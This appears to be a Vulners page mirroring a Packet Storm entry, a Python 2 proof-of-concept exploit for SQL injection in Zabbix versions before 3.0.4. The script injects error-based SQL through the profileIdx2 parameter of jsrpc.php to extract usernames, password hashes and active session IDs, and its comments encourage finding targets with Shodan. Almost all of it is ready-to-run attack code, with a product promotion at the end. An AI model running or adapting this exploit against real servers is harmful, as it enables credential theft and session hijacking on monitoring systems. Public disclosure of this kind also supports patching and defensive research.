Lucene search
K

Zabbix 3.0.3 SQL Injection

🗓️ 08 Sep 2016 00:00:00Reported by ZzziansType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Zabbix 3.0.3 SQL Injection Python Po

Code
`# Exploit Title: 2.0 < Zabbix < 3.0.4 SQL Injection Python PoC  
# Data: 20-08-2016  
# Software Link: www.zabbix.com  
# Exploit Author: Unknown(http://seclists.org/fulldisclosure/2016/Aug/82)  
# Version: Zabbix 2.0-3.0.x(<3.0.4)  
  
# PoC Author: Zzzians  
# Contact: [email protected]  
# Test on: Linux (Debian/CentOS/Ubuntu)  
  
# -*- coding: utf_8 -*-  
# Use Shodan or and enjoy :)  
# Comb the intranet for zabbix and enjoy :)  
import sys,os,re,urllib2  
def Inject(url,sql,reg):  
payload = url + "jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=" + urllib2.quote(  
sql) + "&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1"  
try:  
response = urllib2.urlopen(payload, timeout=20).read()  
except Exception, msg:  
print '\t\tOpps,an error occurs...',msg  
else:  
result_reg = re.compile(reg)  
results = result_reg.findall(response)  
print payload #Uncomment this to see details  
if results:  
return results[0]  
def exploit(url,userid):  
passwd_sql = "(select 1 from (select count(*),concat((select(select concat(cast(concat(alias,0x7e,passwd,0x7e) as char),0x7e)) from zabbix.users LIMIT "+str(userid-1)+",1),floor(rand(0)*2))x from information_schema.tables group by x)a)"  
session_sql="(select 1 from (select count(*),concat((select(select concat(cast(concat(sessionid,0x7e,userid,0x7e,status) as char),0x7e)) from zabbix.sessions where status=0 and userid="+str(userid)+" LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"  
password = Inject(url,passwd_sql,r"Duplicate\s*entry\s*'(.+?)~~")  
if(password):  
print '[+]Username~Password : %s' % password  
else:  
print '[-]Get Password Failed'  
session_id = Inject(url,session_sql,r"Duplicate\s*entry\s*'(.+?)~")  
if(session_id):  
print "[+]Session_idi1/4%s" % session_id  
else:  
print "[-]Get Session id Failed"  
print '\n'  
  
def main():  
print '=' * 70  
print '\t 2.0.x? < Zabbix < 3.0.4 SQL Inject Python Exploit Poc'  
print '\t\t Author:Zzzians([email protected])'  
print '\t Reference:http://seclists.org/fulldisclosure/2016/Aug/82'  
print '\t\t\t Timei1/42016-08-20\n'  
urls = ["http://10.15.5.86"]  
ids = [1,2]  
for url in urls:  
if url[-1] != '/': url += '/'  
print '='*25 + url + '='*25  
for userid in ids:  
exploit(url,userid)  
main()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Sep 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
34